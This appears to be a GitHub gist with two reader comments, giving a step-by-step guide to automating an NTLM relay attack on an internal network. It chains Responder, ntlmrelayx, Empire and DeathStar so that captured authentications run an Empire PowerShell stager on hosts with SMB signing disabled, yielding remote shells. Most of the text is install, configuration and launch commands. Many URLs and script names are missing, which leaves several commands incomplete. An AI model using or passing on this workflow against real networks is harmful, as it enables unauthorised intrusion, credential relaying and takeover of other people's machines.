Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Pwning internal networks automagically


This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone /opt/impacket
cd /opt/impacket
pip install .

However, if I install other tools like Empire first, then the impacket install complains about not being able to install/uninstall the updated version. In raising this issue it looks like the way to handle that is:

sudo apt-get remove python-impacket
git clone /opt/impacket
cd /opt/impacket
pip install .

However, by doing that it rips out a bunch of other packages, so then you have to reinstall them with something like:

apt-get install crackmapexec enum4linux kali-linux-full keimpx polenum set smbmap sparta wol-e -y

So long story short: handle the ntlmrelayx install with care.

Download and install Empire

git clone /opt/empire
cd /opt/empire

Download Deathstar

git clone /opt/deathstar

Download responder

git clone /opt/responder

Now open /opt/responder/Responder.conf and turn SMB and HTTP to off:

[Responder Core]

; Servers to start
SQL = On
SMB = Off <-- it's usually "On" so change to "Off"
Kerberos = On
FTP = On
POP = On
HTTP = Off <-- it's usually "On" so change to "Off"
DNS = On

Create list of targets that have SMB signing disabled:

mkdir /scripts
cd /scripts
/opt/responder/tools/ -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

The resulting targets.txt should have a list of IPs with SMB signing disabled:

Create batch of scripts so you're ready to automate the pwnage!

sudo mkdir /scripts
cd /scripts
sudo echo "cd /opt/empire" >
sudo echo "sudo ./empire --rest --username empireadmin --password Password123" >>
sudo echo "sudo /opt/deathstar/ --listener-ip YOUR.IP -t 100" >
sudo echo "# In the script below, replace YOUR-POWERSHELL with what you get from Empire." >
sudo echo "sudo python /opt/impacket/examples/ -tf targets.txt -c 'YOUR.POWERSHELL'" >>
sudo echo "sudo python /opt/responder/ -I YOUR-LAN-INTERFACE -r -d -v" >

Note: my pal JF in Slack suggested the following tweaks to to make it easier to populate the machine's IP address:

sudo /opt/deathstar/ --listener-ip `ifconfig eth0 | grep inet | awk '{print($2)}' | head -n 1` -t 100

Now open up all the scripts created in /scripts and adjust as necessary. Note: you won't be able to totally fill in the necessary info for just yet, so wait until you proceed to the next section:

Set all scripts as executable

cd /scripts
chmod +x
chmod +x
chmod +x
chmod +x

Run Empire

Get Empire running in a screen session:

cd /scripts
screen -S empire -dm -L /scripts/

Run DeathStar

Get DeathStar running in a screen session:

screen -S deathstar -dm /scripts/

Get Empire PowerShell code for

Connect to the Empire screen session

screen -R empire

At the empire prompt, run these commands to get the DeathStar PowerShell code:

launcher powershell DeathStar

Now press Ctrl+A and then D to exit the screen session. In /scripts there should be a screenlog.0 file, which is a log file of everything happening in the Empire screen session. Do a cat screenlog.0 and copy the entire chunk of code that starts with powershell and ends with something like 0238jfDAfhAdfAkdf==

Next, open /scripts/ and where you see YOUR-POWERSHELL paste the PowerShell that you got in the previous steps. Remember that in this script, there's a tick at the start of powershell and then a closing tick at the end of your PowerShell code.


Run a new screen session with ntlmrelayx:

screen -S ntlmrelayx -dm /scripts/

Note: you might find that when running the console barfs up some weird error like:

Traceback (most recent call last):
  File "examples/", line 45, in <module>
    from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/", line 1, in <module>
    from httprelayserver import HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/", line 27, in <module>
    from impacket.examples.ntlmrelayx.clients import SMBRelayClient, MSSQLRelayClient, LDAPRelayClient, HTTPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/", line 3, in <module>
    from ldaprelayclient import LDAPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/", line 17, in <module>
    from ldap3 import Server, Connection, ALL, NTLM, RESULT_SUCCESS, MODIFY_ADD
ImportError: cannot import name RESULT_SUCCESS

If that happens, you may need to rip and replace your version of impacket. See the section above where I address this, as well as the GitHub issue here that should help you.

Launch Responder

Run a new screen session with Responder:

screen -S responder -dm /scripts/

Keep an eye on Empire and DeathStar screen sessions to watch the shells come pouring in:

screen -R empire
screen -R deathstar

Have fun :-)

Quick start for next time

Put the following commands in a file called /scripts/

screen -S empire -dm -L /scripts/
screen -S deathstar -dm /scripts/
screen -S ntlmrelayx -dm /scripts/
screen -S responder -dm /scripts/



This comment has been minimized.

Copy link

@wankcrack wankcrack commented Sep 8, 2020

Hi, I tried this manually, but having some error when it comes to ntlmrelay. It seems that empire will run automatically at port 80, then when you run the ntlmrelay you will get an error saying that port is already in used.


This comment has been minimized.

Copy link
Owner Author

@braimee braimee commented Sep 9, 2020

@wankcrack Thanks for the update. It's been a long while since I've used this exact approach so the email might be a bit outdated. However, I did see info that says byt3bl33d3r is working on an updated version of Deathstar so I may come back eventually to make this doc more current.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment